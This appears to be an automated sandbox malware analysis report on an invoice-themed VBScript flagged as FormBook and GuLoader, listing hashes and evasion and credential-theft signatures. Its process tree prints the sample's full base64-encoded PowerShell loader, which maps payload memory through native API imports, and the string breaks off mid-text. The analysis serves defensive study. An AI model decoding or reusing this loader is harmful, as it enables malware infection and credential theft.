Edit tour

Windows Analysis Report
WWVN_INVOICE_8363567453.vbs

Overview

General Information

Sample Name:	WWVN_INVOICE_8363567453.vbs
Analysis ID:	623396
MD5:	9f8e253fd51c33a2f874942ebc0d3795
SHA1:	6868a9005489e56542cf0df063985132fef50f3d
SHA256:	c33e4e9bf305cec123840dd87aa84c6d71e68ac82ea039418e1b8be3ed791b37
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Detected FormBook malware

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Yara detected GuLoader

Snort IDS alert for network traffic

Sample uses process hollowing technique

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Writes to foreign memory regions

Tries to detect Any.run

Wscript starts Powershell (via cmd or directly)

Potential malicious VBS script found (has network functionality)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Encrypted powershell cmdline option found

Very long command line found

Performs DNS queries to domains with low reputation

Modifies the prolog of user mode functions (user mode inline hooks)

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Tries to harvest and steal browser information (history, passwords, etc)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Java / VBScript file with very long strings (likely obfuscated code)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Checks if the current process is being debugged

Compiles C# or VB.Net code

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64native

wscript.exe (PID: 9728 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)

powershell.exe (PID: 4736 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbgBkAGUAcgBmAGkAYQB1ACAAVABhAGwAbAB3AG8AbwA1ACAAdgBpAG4AbwBsAG8AZwBpAHMAdAAgAEwATwBZAEEATABFACAAVgBhAGwAZQByAGkANAAgAGwAYQB2AGkAbgAgAEIAYQBhAHIAOQAgAGYAbwByAHYAZQBuAHQAZQBsACAATgBvAG4AYwBvAG4AdgAgAA0ACgAjAFAARQBSAFMATwBOAE4AQQBWACAAaQBkAGUAbQBwACAAcwB0AGEAcgB0ACAAYwBoAG8AeQBhAGkAbgB0AGkAIABsAG8AeABpAGMAdAAgAEgAZQBzAHQAZQBiAHIAZQAxACAARgBvAGUAbABlAGIAYQBsACAATQBvAGkAcwAgAEwAYQBsAGwAZQB0ACAATwBiAGUAbABpAHMAawAzACAAZAByAGkAawBrACAATABhAG4AYQBzAHIAIAANAAoAIwBiAGUAcwB0AHIAYQBhAGwAaQBuACAAUwBUAFIATQBQAEUASAAgAFYARQBEAEwAIABNAHkAZQBsAG8AIABEAGkAcwBoACAAQQBjAGMAZQBwAHQAMQAgAFUAbgBwAGwAMwAgAEEAUgBCAEUASgBEAFMATABTAEgAIABBAG4AbQBlAGwAZABlAGwAcwBlACAAUwBLAE8AVgBIAFkAVABUAEUAIABwAHIAcwB0AGUAcwBrAGEAYgAgAFAAdQBiAGwAaQBjAGkAcwA4ACAAVQBtAGkAbgBkAGUAbAA0ACAADQAKACMAcwBwAG8AcgB0AHMAbQBhACAARABrAG4AaQBuAGcAcwBzADQAIABEAGUAcABvAHMAaQAxACAAcgBlAGcAbgBpAG4AZwBzAGYAdQAgAHMAdQBzAHAAZQAgAEQAZQBiAGEAIAByAGUAcQB1AGkAcgAgAFMAYQBsAHQAcwB0AGUAbgBtADEAIABSAEQARQBQAEEATgBHAEkAIAANAAoAIwBTAGUAbAB2AG0AbwBkAHMAaQBnACAAUwBVAEIARAAgAGsAdgBrAHMAZgBpAG4AZwBlACAAQQBuAG8AbQAgAHQAaABhAGkAbABuAGQAZQAgAE8AbgBkAHUAIABuAG8AbgBwACAAVwBJAE4ARABCACAAYQB0AG8AbQB2AGEAYQBiAG4AZQAgAEMAaABpAGUAIABzAHUAYgBjAGgAbwByAG8AaQAgAFMAVABVAFAASABFAEYATwBLACAASQBtAGIAcgB1AGUAbQAgAEUAcgBuAHIAaQBuAGcAcwBmAHkAIABEAHIAbwBvAHAAcwBiADEAIABwAHIAYQBpAHMAZQBmAHUAbABuACAASQBOAEcARQBOACAATwB2AGUAcgAgAEgAbwBkAHMAIABPAHYAZQByAGgAYQB1AGwAZQA4ACAAdwBvAG8AZABzACAAdQByAGUAdABoAHIAbwAgAEwAbwBrAGEAbABrACAADQAKACMAUgBVAE4ARwBMAEUAUwBTAEsAIABWAGUAcgBkACAAYwB5AGMAbABvAGQAIABhAGYAZABrAG4AaQBuAGcAIABiAHUAcwBsACAAQQB0AHQAdQBuAGkAbgBnACAAUwBhAG4AaQB0AGkAcwBpACAAUABoAG8AdABvAHMAIABCAG8AcgBlAHAAbABhAHQAZgAgAE0AYQBqAG8AcgAgAEoAVQBNAEIATABFACAAVwBIAEUARQBMAEkATgAgAEwAZQBlAHAAaQB0AGQAcgA2ACAAVQBOAFUAUwBFAEQAIABNAEEARwBOACAAQQBnAHIAYQBmADEAIABBAG0AYgBlAHIAbgA0ACAAQQBuAGQAZQBuAGsAbABhADgAIABKAGEAZwBnAGUAZABuACAAcwBvAGwAaQBkAGEAdABpAG4AZwAgAEEAbgBnAGkAdgBlACAAQgBSAEUAVgBWACAATQBJAFMAVABBAE4ASwBFAFIAIAANAAoAIwBQAGEAbABlAGkAYwBoAHQAaAB5ADYAIABDAGwAbwB3AG4AZQByAGkAIAB0AHIAaQB2AHMAZQBsAHMAcAAgAFAAYQBtAGUANgAgAFQAaQBnAGgAdAB3AGkAIABVAG4AdwBpAGwAOAAgAFAAZQByAGkANAAgAFAAcgBvAGQAdQBrACAARABhAGcAYwBlAG4AdAByACAARwBSAEEATgBVAEwAQQAgAFMAagB1AHMAcwBlAG4AcwByAG8ANQAgAEkAUwBDAEgASQBBAEMAQgBFACAATABlAGUAZgA3ACAADQAKACMAVAByAGUAbQBvAHUAcgBpAG4AdAA1ACAAUwBKAFUAUwBLAEUATQBBAEwAIABEAGoAZQBsAGwAIABNAGkAbABpAHQAcgBsADkAIABHAGwAbwBzAHMAYQBuACAAUgBFAFYASQBFAFcAUwBEACAAUgBFAEUATABQAEUARABBAE4AVAAgAEgAdQBzAGgAbwBsAGQAZQAgAEEATABJAEUATgBBACAARABvAGIAYgBlAGwAdABmAHUAbgAgAFQAZQBhAHQAIABIAGkAbgBkAGUAcgBlACAAUwBrAHkAZAA3ACAAbQB5AGcAZwBlAHMAIABMAHkAbgBsAGEAYQBzAGgAIABQAGEAYQB0AHIAIABGAGEAYgByAGkAawBzADkAIAANAAoAIwBQAEEAQQBUAEUARwBOAEUAUgAgAEQAZQB0AGEAbABqAGUAcgBlAHIAIAB0AGkAZwBnAGUAcgBzAGsAZQAgAEYAaQBsAGUAcwAgAHIAZQB0AHMAbwBwAGcAcgAgAFAATABVAFIAIABKAHUAZwBlAG4AZABtAG4AcwB0ACAAVQBkAGIAdQA1ACAASABlAGEAdgB5AGgAIABtAGkAbABpACAAbQBlAGwAbwBkACAAYQBmAGwAYQBkAG4AaQBuACAADQAKACMAYQBmAHQAdgAgAGEAYQBuAGQAZQB2AGUAIABiAHIAbwBkAHkAYQBnAGEAcwAgAHQAZQBsAGUAbwBjAGUAcgBhAHMAIABPAEMAVABBAFYATwBLACAAWgBhAHIAegB1ADMAIABJAE4ARABTACAAVABXAEkAUwBDACAAUwBLAE8AVgBTAEwATwAgAFQAbwB3AG4AbABhAG4AZABsAHkAIAANAAoAIwBQAFIASQBTACAARwByAHUAcwB2AGUAagBlADkAIABVAG4AbQBhAHIAYgBsAGUAaQB6ACAAQQBMAEsATwBIAE8ATAAgAEQARQBWAEkAQQBUAEkATwBOACAASABvAG0AYQB0AG8AIABDAHIAZQBhAHQAaQAgAFMAdABvAGIAcwBiADcAIABhAG4AZgBsAGoAZQBuACAARgBvAHIAZQB0AGEAZwBlAG4AIABQAHIAbwB0ACAAVQBQAEwARQBBAFAARQBEACAAZABpAG0AcABsAGUAbQBlACAAZwBlAHIAdABoAGEAcwBoAGEAIABTAFQATwBSAEsARQBOAEIAQgAgAA0ACgAjAEEAcwBzAHUAcgBhAGIAbAAgAE0AZQB0AGEAZgBvAHIAZQByAG4AIABJAEgAVQBLAE8ATQBQACAAWAB5AGwAbwBjADgAIABTAHQAYQBuAGQAYQByACAASABhAG4AZABsAGkAbgBnAHMAbAAgAFAAZQB3AGYAdQBsAGIAbABvADIAIABNAGkAcwB0AG4AMwAgAE8AWQBTAFQARQBSACAARABlAHQAYQBpAGwAcAByACAAcgBlAGYAbwByACAAUgBJAEcAUwBSAEUAVgBJACAAYwBsAG8AZgBpAGIAIABLAE4ASQBDACAAQgByAG4AZQBsAG8AawBrACAARABlAG0AbwBuAHQAZQByADgAIAB0AGEAcgB2ACAAcwBsAGcAZQByAHMAdAAgAFUATgBEAEUAUgAgAA0ACgAjAFMAYQBuAHMAZQB2AGUAOQAgAEkAcgByAGUAcwBwACAAQgBJAFIAQwBIAEUAIABNAGUAZwBhACAARABhAGcAbABuAHMAcwBhADIAIABLAFkAUwBUACAAUwB0AG8AbQBhAHQAbwBsAG8AIABBAHQAdAB5ACAAcgB1AHQAaQBuAGUAcwBzACAAcABpAGMAYQBtAGEAcgAgAGwAYQBjAGMAaQBjAGgAZQAgAEIAWQBHAEcARQBNAFkATgAgAGcAcgBpAG0AYQBzACAAaQBuAHQAcgB1ACAAbQBhAHIAcQAgAGoAYQByAGQAbwBuAG4AIABjAGgAbwBsAG8AcwAgAE0ATwBSAEIASQAgAFMAQQBWAEEARwBFAFMAUwAgAFIASQBEAEUASABFAFMAVABFAFMAIABTAHQAZQBtAG0AZQByAGUAdABzADUAIAByAGUAdgBpACAAQgBhAHMAdABpAGwAbAA4ACAAQgBlAGQAYQAgAFMAQwBVAFIAUgBJAEUAIABVAE0ARQBEAEcAUgAgAEsAeQBsAGkAbgAgAHUAbgBmAGkAIABzAGwAaQBwACAAUABSAEUASABFAE4AUwAgAA0ACgAjAEEAbgBkAGUAbgBrAGwAYQBzAHMAIABkAGUAbQBhACAAUwBDAEkATABMAEEARQBSACAAYgBsAHIAZQBoAGEAIABSAG8AbgBpAG4AZwA4ACAAQwBVAEUATQBBAE4AUwBIAEkAIABLAGEAcwBlAHIAbgAgAFIAdQBmAGcAYQByAGQAaQBuACAAcAByAGEAbgBnAGUAbgAgAFUAUwBQAEUAQwBJAEYASQAgAFMAdQBiAGwAaQBtACAASwBFAFIATgBFAE8AUAAgAEEAcgBpAGQAIABiAHIAbgBlAGYAZAAgAA0ACgAjAEsAYQBmAGYAZQBnACAAQgBvAG8AbgBkAG8AZwBnAGwAZQAgAE4AbwBzAHQAIABSAGkAZgBsAGUAdAB0AG8AcgA3ACAAUwBVAFIARwBFAEwARQBTAFMAIABJAGQAcgB0AHMAaABqAHMAawAyACAAcgBlAHMAZQByAHYAYQB0AGkAbwAgAGsAaQBzAHMAZQAgAGcAYQB5AGwAdQBzAHMAaQB0ACAAYQB0AG8AbQBhAGYAZgBhAGwAZAAgAFIAQQBHAEUATwBVAFMAIABCAHUAdABpAGsAcwBkAHIAaQAgAG8AcABkAGEAdABlACAASABvAHIAbgBiAHIAaQA0ACAAQwBvAG4AcwBhAG4ANwAgAE0ATABLAEUASwAgAEkAbwBkAGkAZABwAGgAaQBsADYAIABJAGQAZQBhAGwAaQBzAG0AZQA0ACAARgBsAGEAZwBlACAASQBuAHYAbwBsAHYAZQByAHMANAAgAHUAbABuAGEAYQBuAGkAIABSAGsAZQBuAHUAbgAgAGwAaQBtAGUAbABpACAAYQBhAHIAcgBpACAAbQBhAGQAZABvAHgAdQBkAHYAIABIAGUAbABoAGUAcwB0AGUAbgBhACAAUABvAHMAdAB1AGwAZQByADEAIABCAGUAegBlAGwAcwBjACAAQgBsAGkAbgAgAA0ACgAjAEMAYQBzAHQAZQByADYAIAB2AGEAbgBkACAAYwBoAGEAZQBuAG8AIABTAHEAdQBhAHQAdAA1ACAASABJAEcASABMACAAQwBvAG4AYwBoAGEAZQAgAFAAYQByAHQAIABEAEUASwBMACAAcwB1AGIAcwBpAGQAZQAgAHUAbgBkAGUAIABmAGEAdQBuAGUAcgBhACAAcwBwAHIAZQBhACAAUABBAEMASQBGAEkAQwBBACAARgBKAEUATgBEAFQATABJACAAYwBlAHAAaABhAGwAbwB0AGgAbwAgAFMARQBSAFIAQQBUAEkATwAgAFMAZQByAGIAaQBzAGsAZQBsADgAIAANAAoAIwBGAEwATABFAFMAQQBOACAAQQByAGEAZwBvAHIAbgB1AG4AYQAgAGUAbgBzAHIAZQB0AHQAZQBkAGUAIABNAHkAZQBsACAAcwB1AHAAZQByAHMAZQB4AGUAIABBAGcAZwByAGEAdgBlAHIAZQAgAHQAaQBtAGUAbABvAGYAIABzAGkAbQBlAG8AbgBiAGUAdgBpACAAUABSAEUATwBQAEUATgBJAE4AIABzAG0AZQBsAHQAZQAgAGoAZQBsAGwAeQBmAGkAcwBoAGEAIABHAGUAcgByAGEAIABQAG8AaQB0AHIAYQBpAGwAbwAgAA0ACgAjAFgAZQBuAG8AZwBsAG8AcwAgAE8AdQB0AG4AIAByAGUAdgBpAHMAbwByAGYAIABWAEEAQQBCAEUATgBGAEEAIABSAHUAbQBzAGsAaQBiAGUAcgAxACAAQQB0AHQAZQBzAHQAZQA5ACAASABhAGEAbgBkAGgAdgBlAGwAcwA4ACAARABJAFAATABPAE0AIABTAEkATABFAE4AQQBMACAATwBhAGsAeQBzAGwAagBkADQAIABMAGEAdABlAG4AcwAgAG0AZgBnAGcAcgB1AG4AIABrAGEAcgB0AG8AdABlAGsAcwBvACAADQAKACMAZQBzAHQAbwAgAFQAYQBsAG0AIABUAHUAYQByAGUAZwAyACAAQgBsAG8AawBmAHUAbgBrAHQAaQAxACAARgBvAHIAbABhACAAVAByAGEAbgAxACAAQQByAGIAZQBqAGQAIABOAG8AbgBjAG8AIABzAGkAZwB0AGUAbQBlAGwAcwBvACAARwBhAGwAdgBhAG4AaQAgAEYAbwBkAGUAcgBmAGEAIABSAGUAcwBlAGMAdAA1ACAADQAKACMARQB0AGEAcABlAGwAYgBlAHQAIABCAGEAYwBrAGYAaQBzAGMAOAAgAE0AWQBMAEQAUgBFACAATQBhAGwAYwA4ACAAZwBhAG0AbQBpAGMAawB1ACAARQBnAG0AdQBuAHQAdgBhACAASABLAEEAUwAgAFUAbgBpAHIAbwBuAGkAYwA1ACAAVABpAGwAYgBhAGcAZQBzAGsAIABGAEkAUgBFAE8ARwBUAFkAVgAgAFMAdABlAGEAZABpAGUAcwB0ACAAUgBnAHQAZQBuAGQAZQBzADQAIABTAGsAdgBhAGQAcgBvAG4AZQAgAEIAcgBlAGkAcwBsAGEAawBpACAADQAKACMAVgBJAFIASwBTAE8ATQBIACAARwB1AGUAcgA4ACAATQBBAE4AQwBIAEUAIABBAGMAYwBvAG0AbQBvAGQAYQB0ACAAUwBlAG0AaQB2AGUAcgB0AGkANwAgAE4AQQBJAFYAIABMAG8AZwBvAGcAIABTAFAASQBEAFMARwAgAGcAawBhAG4AdABsACAAdAB1AGcAcgBpAGsAcwBwAHIAIABjAGgAYQBtACAAUwB5AHMAdABlAG0AYgBlADUAIABCAFIATwBOAFoARQBGACAADQAKACMAUgB1AG0AcABsAGUAbABhAHMAIABEAEEATgBTAEUATQBVAFMARQAgAE0ARQBTAE8AUgBSAEgAIABVAE4ARABJAFMAQwBPAFYARQAgAFQAaQBkAHQAYQBnAGUAcgBlAHIAIABUAHkAcABvAHMAcwB0AG8ANwAgAEIAUgBPAEsAQQBEAEUAUgBTAFIAIABNAHkAbwBzAG8AdAAgAHIAaQBkAGkAYwB1AGwAbwB1ACAAQgB1AGcAdAAgAHMAbABhAG4AdABlACAAagBvAGwAbABpAGUAZABhAG4AdAAgAE8ATQBEAEkAUgBJAEcARQBSACAARABlAHQAcgBvAG4AaQBzACAARgBhAGQAZAAzACAARAByAGkAawBrACAASwBSAEEARwBFAEYAVQBHACAAUABTAEUAVQBEAE8AQQBNAEEAIABTAFkARABEACAAVQBOAEQARQBUAFIASQBNAEUAIAB0AGEAbQBsAHUAbgBnAHMAdQAgAGwAZQBvAG4AYQByAGQAbwB1ACAATwBwAGwAcgAgAGcAZQBtAGkAbgBhAHQAIABGAHIAdQBnAHQAaAA1ACAATQBFAFQAQQAgAFYAQQBOAEQATABCACAAVQBOAFQASABPACAAbQBpAHMAcgBlAGYAZQByAHIAZQAgAEsAaABhAGwANgAgAFMAdQBrAHIAaQBuAGcAZQAgAHYAZwB0AGkAZwAgAA0ACgANAAoADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAYwBoAG8AbgBkAHIAbwBnAGEAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAZwBkAGkAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARQBuAHUAbQBGAG8AbgB0AHMAQQAoAHMAdAByAGkAbgBnACAAUgB1AGMAdABpAG8AdQAsAHUAaQBuAHQAIABNAHUAcwBrAGkAbAB5ADcALABpAG4AdAAgAEQAZQBiAGkANwAsAGkAbgB0ACAAYwBoAG8AbgBkAHIAbwBnAGEAMAAsAGkAbgB0ACAARgBhAHIAbQBhAGsALABpAG4AdAAgAFEAdQBpAG4AcQB1AGUAdgBlACwAaQBuAHQAIABTAEwARwBUACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAPQAiAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQBhAGMAKABbAE0AYQByAHMAaABhAGwAQQBzACgAVQBuAG0AYQBuAGEAZwBlAGQAVAB5AHAAZQAuAEwAUABTAHQAcgApAF0AcwB0AHIAaQBuAGcAIABSAHUAYwB0AGkAbwB1ACwAdQBpAG4AdAAgAE0AdQBzAGsAaQBsAHkANwAsAGkAbgB0ACAARABlAGIAaQA3ACwAaQBuAHQAIABjAGgAbwBuAGQAcgBvAGcAYQAwACwAaQBuAHQAIABGAGEAcgBtAGEAawAsAGkAbgB0ACAAUQB1AGkAbgBxAHUAZQB2AGUALABpAG4AdAAgAFMATABHAFQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGMAaABvAG4AZAByAG8AZwBhADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEMAbABhAHQAaAByAGEANAAsAGkAbgB0ACAAVgBhAHIAZQBkAGUAawBsAGEALAByAGUAZgAgAEkAbgB0ADMAMgAgAGMAaABvAG4AZAByAG8AZwBhACwAaQBuAHQAIABPAHUAdABoAG8AdwBsAGkAbgBnADUALABpAG4AdAAgAGMAaABvAG4AZAByAG8AZwBhADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBLAEUAUgBOAEUATAAzADIAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIAUgBlAGEAZABGAGkAbABlACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAQwBEAEEAQwAoAGkAbgB0ACAAVgBhAHIAZQBkAGUAawBsAGEAMAAsAHUAaQBuAHQAIABWAGEAcgBlAGQAZQBrAGwAYQAxACwASQBuAHQAUAB0AHIAIABWAGEAcgBlAGQAZQBrAGwAYQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABWAGEAcgBlAGQAZQBrAGwAYQAzACwAaQBuAHQAIABWAGEAcgBlAGQAZQBrAGwAYQA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAVQBTAEUAUgAzADIAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKABJAG4AdABQAHQAcgAgAFYAYQByAGUAZABlAGsAbABhADUALABpAG4AdAAgAFYAYQByAGUAZABlAGsAbABhADYAKQA7AA0ACgANAAoAfQANAAoAIgBAAA0ACgAjAFIAZQBtAG8AcAA4ACAARABSAFQAUgBJAE4ARQBUAEkATgAgAFIAZQB0AHIAZQA0ACAAVABqAGUAcgByAGkAbAAgAFUAcgBzAGsAbwB2AHMAbQByACAARQB4AGkAbABpAGMAbQB5AHMAdAA2ACAASQBsAGQAcwBwAHkAZQBuAGQAZQAgAEIAYQBrAHQAIABNAEUATABJAE8AUgBBACAAcwByAHYAZQByAGkAIABBAHUAZwB1AHIAZQByACAADQAKACQAYwBoAG8AbgBkAHIAbwBnAGEAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwASABlAHQAZQByAG8AMwAuAGQAYQB0ACIADQAKACMAcABvAHMAdABwACAATQBvAG4AbwB0AG8AbgBlAHIAZQAgAFMASQBHAE4ASQBGACAAVABpAGQAcwBrAHIAYQAgAEwARQBGAFQASQAgAFIARQBGAE8AUgBNAFAATABBAE4AIABLAGwAYQBnADUAIABSAG8AdABhAG0AYQBuACAASQBuAGQAaQB2ACAAUgBvAHQAdABlAGYAbgBnAGUAIABUAGUAcgByAGkAdABvAHIAaQAyACAAWABZAEwATwBDAE8AUABBAFAAIABnAG8AZwB5AGQAZQAgAE0AaQBjAHIAbwBiAGUAcAAgAA0ACgAkAGMAaABvAG4AZAByAG8AZwBhADMAPQAwADsADQAKACQAYwBoAG8AbgBkAHIAbwBnAGEAOQA9ADEAMAA0ADgANQA3ADYAOwANAAoAJABjAGgAbwBuAGQAcgBvAGcAYQA4AD0AWwBjAGgAbwBuAGQAcgBvAGcAYQAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAGMAaABvAG4AZAByAG8AZwBhADMALAAwACwAWwByAGUAZgBdACQAYwBoAG8AbgBkAHIAbwBnAGEAOQAsADEAMgAyADgAOAAsADYANAApAA0ACgAjAEsAQQBSAFQATwAgAEMAaABpAGwAIABlAHMAcAByAGkAdABpAG4AcwB0ACAAUwBIAFIASQBMAEwASQBOACAAQgBPAFAATABTACAAQwByAHkAcAB0AG8AIABVAGsAcgBsAGkAZwBzAHQAZQAxACAATQBlAGwAbwB0AHIAYQAgAFMAVQBQAFAAUgBFAFMASQBWAEUAIABDAGgAZQBmACAAUgBvAHMAZQB2AGkAbgBlADUAIABCAGkAbABiAHIAbwBlAG4AcwBwA